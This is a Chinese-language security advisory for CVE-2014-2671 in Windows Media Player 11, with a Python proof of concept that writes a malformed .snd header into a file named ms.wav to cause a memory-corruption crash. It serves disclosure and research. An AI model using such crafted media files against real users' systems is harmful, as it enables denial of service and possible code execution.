发布日期：2014-03-24
更新日期：2014-03-31

受影响系统：

Microsoft Media Player 11.0.5721.5230

描述：

---

BUGTRAQ  ID: 66403
CVE(CAN) ID: CVE-2014-2671

MediaPlayer是一个全功能的网络多媒体播放软件。

Windows Media Player 11.0.5721.5230及其他版本在实现上存在拒绝服务漏洞，成功利用后可导致任意代码执行。

<*来源：TUNISIAN CYBER
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/python

#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Windows Media Player 11.0.5721.5230 Memory Corruption PoC
#[+] Date: 22-03-2014
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://windows.microsoft.com/fr-FR/windows/windows-media-player
#[+] Friendly Sites: na3il.com,th3-creative.com
#[+] Twitter: @TCYB3R

import os
os.system("color 02")

print"###########################################################"
print"#  Title: WMP 11.0.5721.5230 Memory Corruption PoC         #"
print"#  Author: TUNISIAN CYBER                                  #"
print"#  Category: DoS/PoC                                       # "
print"###########################################################"
  
header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")

filename = "ms.wav"
file = open(filename , "w")
file.write(header)
print "\n Files Created!\n"
file.close()

建议：

---

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://technet.microsoft.com/security/bulletin/

浏览次数：1951
严重程度：0（网友投票）